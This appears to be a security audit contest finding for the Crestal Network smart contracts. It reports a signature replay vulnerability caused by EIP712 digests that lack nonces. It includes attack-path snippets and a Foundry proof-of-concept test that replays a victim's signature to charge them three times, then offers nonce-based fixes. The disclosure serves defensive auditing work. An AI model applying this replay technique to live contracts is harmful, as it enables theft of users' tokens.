Uneven Gingerbread Ladybug

High

# Critical Signature Replay Vulnerability in EIP712 Contract

### Summary

The EIP712 contract lacks replay protection in its signature verification system, making all signature-based operations in the Crestal Network vulnerable to replay attacks. This critical vulnerability allows an attacker to capture valid signatures and replay them multiple times to repeatedly execute operations that were intended to be performed only once by the signer.

### Root Cause

The contract's [`getRequestDeploymentDigest()`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L33) and [`getRequestProposalDigest()`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L19) functions generate message digests without incorporating a nonce or other replay prevention mechanism. The signed data only includes:
```solidity
bytes32 structHash = keccak256(
    abi.encode(
        DEPLOYMENT_REQUEST_TYPEHASH, projectId, keccak256(bytes(base64RecParam)), keccak256(bytes(serverURL))
    )
);
```
These parameters remain constant for a specific operation, so the generated signature can be reused multiple times. The contract has no mechanism to track whether a signature has been previously used

### Internal Pre-conditions

1. No Nonce Tracking: The EIP712 contract doesn't maintain per-user nonces
2. Immutable Parameters: The digest creation depends only on static data
3. Typehash Definitions: Both typehash constants don't include nonce:
```solidity
bytes32 public constant DEPLOYMENT_REQUEST_TYPEHASH =
    keccak256("DeploymentRequest(bytes32 projectId,string base64RecParam,string serverURL)");
```
4. Signature Verification: getSignerAddress() only verifies the cryptographic validity of a signature without checking if it was previously used
5. No Signature Invalidation: No mechanism exists to expire or revoke signatures


### External Pre-conditions

1. Multiple Entry Points: The BlueprintCore contract contains numerous functions that use signatures:
     - createAgentWithTokenWithSig()
     - createAgentWithSigWithNFT()
     - updateWorkerDeploymentConfigWithSig()
     - createProjectIDAndDeploymentRequestWithSig()
     - requestProposalWithSignature()

2. No External Checks: None of these functions implement additional replay protection
3. Multi-Transaction State Machine: The protocol involves a sequence of operations that can be disrupted by replayed signatures

### Attack Path

1. Signature Capture: An attacker monitors the blockchain for transactions containing valid signatures
```solidity
// Example: Captured transaction data
const capturedTx = {
  projectId: "0x1234...",
  base64Proposal: "data:application/json;base64,eyJuYW1lIjoiQWdlbnQifQ==",
  serverURL: "https://api.crestal.network",
  signature: "0xabcd..."
};
```
2. Digest Verification: The attacker ensures the signature is valid by calling:
```solidity
// Using a read-only call to verify signature is valid
const digest = await blueprint.getRequestDeploymentDigest(
  capturedTx.projectId, capturedTx.base64Proposal, capturedTx.serverURL
);
const signer = await blueprint.getSignerAddress(digest, capturedTx.signature);
```
3. Signature Replay: The attacker submits multiple transactions with the same parameters and signature:
```solidity
// Can be repeated unlimited times
await blueprint.createAgentWithTokenWithSig(
  capturedTx.projectId,
  capturedTx.base64Proposal,
  workerAddress,
  capturedTx.serverURL,
  tokenAddress,
  capturedTx.signature
);
```
4. Multiple State Modifications: Each replay creates additional agents, incurs fees, or updates configurations as if authorized by the original signer

### Impact

1. Unauthorized Agent Creation: Multiple agents could be created on behalf of a single user
2. Financial Loss: Each replayed operation could:
     - Consume tokens from the signer's account (`createAgentWithTokenWithSig`)
     - Drain NFT allowances (`createAgentWithSigWithNFT`)
     - Deplete user top-ups
3. Configuration Tampering: Through `updateWorkerDeploymentConfigWithSig`, an attacker could repeatedly modify deployment configurations
4. Protocol Disruption: Replay attacks undermine the relationship model between:
     - Users and their projects
     - Workers and their deployment configurations
     - Payments and authorized operations
5. Trust Concerns: Users may lose trust in the platform if their single signature authorizes multiple unexpected actions

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract ReplayAttackTest is Test {
    BlueprintV5 public blueprint;
    address public victim = address(0x1);
    address public attacker = address(0x2);
    address public tokenAddress = address(0x3);
    bytes32 public projectId = bytes32(uint256(1));
    string public base64Proposal = "data:application/json;base64,eyJuYW1lIjoiQWdlbnQifQ==";
    string public serverURL = "https://api.crestal.network";
    bytes public signature;

    function setUp() public {
        // Setup contracts
        blueprint = new BlueprintV5();
        blueprint.initialize();
        
        // Set necessary state variables
        vm.startPrank(address(blueprint.owner()));
        blueprint.addPaymentAddress(tokenAddress);
        blueprint.setCreateAgentTokenCost(tokenAddress, 100);
        vm.stopPrank();
        
        // Create valid signature from victim
        vm.startPrank(victim);
        bytes32 digest = blueprint.getRequestDeploymentDigest(projectId, base64Proposal, serverURL);
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(1, digest); // Private key 1 for victim
        signature = abi.encodePacked(r, s, v);
        vm.stopPrank();
        
        // Fund victim account
        deal(tokenAddress, victim, 10000);
        
        // Victim approves token spending
        vm.prank(victim);
        IERC20(tokenAddress).approve(address(blueprint), 10000);
    }

    function test_signatureReplayAttack() public {
        vm.startPrank(attacker);
        
        // First legitimate use of signature - succeeds
        bytes32 requestID1 = blueprint.createAgentWithTokenWithSig(
            projectId,
            base64Proposal,
            address(0), // No private worker
            serverURL,
            tokenAddress,
            signature
        );
        
        // Second replay of the same signature - also succeeds
        bytes32 requestID2 = blueprint.createAgentWithTokenWithSig(
            projectId,
            base64Proposal,
            address(0), // No private worker
            serverURL,
            tokenAddress,
            signature
        );
        
        // Third replay of the same signature - also succeeds
        bytes32 requestID3 = blueprint.createAgentWithTokenWithSig(
            projectId,
            base64Proposal,
            address(0), // No private worker
            serverURL,
            tokenAddress,
            signature
        );
        
        vm.stopPrank();
        
        // All operations succeed with different requestIDs
        assertTrue(requestID1 != requestID2);
        assertTrue(requestID2 != requestID3);
        
        // Victim has been charged multiple times (300 tokens instead of 100)
        assertEq(IERC20(tokenAddress).balanceOf(victim), 10000 - 300);
    }
}
```

### Mitigation

1. Add Nonce Tracking:
```solidity
// Track nonces per address
mapping(address => uint256) public nonces;
```
2. Update Typehash Definitions:
```solidity
bytes32 public constant DEPLOYMENT_REQUEST_TYPEHASH =
    keccak256("DeploymentRequest(bytes32 projectId,string base64RecParam,string serverURL,uint256 nonce)");
```
3. Include Nonce in Digest Generation:
```solidity
function getRequestDeploymentDigest(bytes32 projectId, string memory base64RecParam, string memory serverURL, address signer)
    public
    view
    returns (bytes32)
{
    bytes32 structHash = keccak256(
        abi.encode(
            DEPLOYMENT_REQUEST_TYPEHASH, 
            projectId, 
            keccak256(bytes(base64RecParam)), 
            keccak256(bytes(serverURL)),
            nonces[signer]
        )
    );

    return _hashTypedDataV4(structHash);
}
```
4. Implement Signature Consumption:
```solidity
function consumeSignature(bytes32 digest, bytes memory signature) internal returns (address) {
    address signer = getSignerAddress(digest, signature);
    nonces[signer]++;
    return signer;
}
```
5. Update Client-Side Signature Generation: Update client applications to include the appropriate nonce when generating signatures.


By implementing these changes, each signature will only be valid for a single use, preventing replay attacks.